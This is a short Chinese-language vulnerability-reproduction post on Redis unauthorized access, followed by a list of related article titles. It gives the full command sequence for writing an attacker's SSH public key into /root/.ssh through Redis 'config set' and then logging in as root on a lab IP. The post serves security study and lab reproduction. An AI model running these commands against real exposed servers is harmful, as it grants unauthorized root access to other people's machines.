【漏洞復現】Redis未授權訪問漏洞
0x01 漏洞簡介
Redis伺服器預設繫結在0.0.0.0:6379,這會導致redis暴露在公網上,在未經過認證的情況下,任何人都可以進行登入。攻擊者可以通過向redis上寫入公鑰,再利用私鑰進行登入。
利用redis的config命令,可以向伺服器上寫檔案,攻擊者通過將自己的公鑰寫入到伺服器的/root/.ssh資料夾下的authroized_key檔案中,即可成功登入到目標伺服器。
0x02 漏洞復現
首先,生成自己的公鑰和私鑰
ssh-keygen -t rsa
會在/root/.ssh下生成id_rsa(私鑰)、id_rsa.pub(公鑰)
然後將公鑰寫入到一個txt中
(echo -e "\n\n";cat id_rsa.pub;echo -e "\n\n") > pino.txt
之後將該檔案的內容通過redis的config命令寫入到伺服器上
cat pino.txt|redis-cli -h 192.168.3.55 -x set pino
redis-cli -h 192.168.3.55
>config set dir /root/.ssh
>config set dbfilename "authroized_keys"
>save
>exit
到目前為止我們已經把自己的公鑰上傳到了伺服器上了,這個時候就可以通過私鑰來進行ssh登入了。
ssh -i id_rsa root@192.168.3.55
就可以成功登入到伺服器了。
0x02 遇到的問題及解決方案
如果之前一切順利後卻發現最後一步ssh登入報錯了,如下:
sign_and_send_pubkey: signing failed: agent refused operation
可以通過
eval "$(ssh-agent -s)"
ssh-add
解決
如果還有什麼問題,歡迎私信交流~
相關文章
- Redis v6.0.5未授權訪問漏洞復現Redis
- Redis未授權漏洞復現Redis
- Redis 未授權訪問漏洞利用Redis
- 利用redis未授權訪問漏洞(windows版)RedisWindows
- 銘說 | Redis未授權訪問漏洞GetshellRedis
- Redis未授權訪問漏洞利用總結Redis
- mongodb未授權訪問漏洞MongoDB
- Redis 未授權訪問漏洞(附Python指令碼)RedisPython指令碼
- 系統滲透漏洞の未授權訪問
- Mongodb未授權訪問漏洞全網探測報告MongoDB
- Java安全漏洞:Druid未授權訪問解決JavaUI
- spark未授權RCE漏洞Spark
- 利用CouchDB未授權訪問漏洞執行任意系統命令
- Linux sudo 漏洞可能導致未經授權的特權訪問Linux
- 從零開始學習各種常見未授權訪問漏洞
- 多款Intel產品未授權訪問漏洞(CVE-2017-5689)Intel
- JBOSS未授權訪問
- Etcd REST API 未授權訪問漏洞暴露 750MB 密碼和金鑰RESTAPI密碼
- 【雲原生攻防研究】Istio訪問授權再曝高危漏洞
- SaltStack未授權訪問及命令執行漏洞分析(CVE-2020-16846/25592)
- Redis 未授權訪問缺陷可輕易導致系統被黑Redis
- Hadoop Yarn REST API未授權漏洞利用挖礦分析HadoopYarnRESTAPI
- Druid未授權訪問實戰利用UI
- [BUG反饋]分類授權漏洞
- Apache漏洞復現Apache
- 記一次特別的未授權訪問
- 蘋果補上了可被未授權收集感測器資料的iPhone漏洞蘋果iPhone
- phpStudy poc漏洞復現以及漏洞修復辦法PHP
- weblogic 漏洞復現Web
- 笑臉漏洞復現
- SSRF結合Redis未授權的打法Redis
- 基於Docker的MongoDB實現授權訪問DockerMongoDB
- 網站漏洞修復服務商關於越權漏洞分析網站
- pgAdmin未授權命令執行漏洞(CVE-2022-4223)
- 【阿菜漏洞復現】DeFi 平臺 MonoX Finance 漏洞分析及復現MonoNaN
- php反序列化和redis未授權PHPRedis
- weblogic ssrf漏洞復現Web
- Vulhub WebLogic漏洞復現Web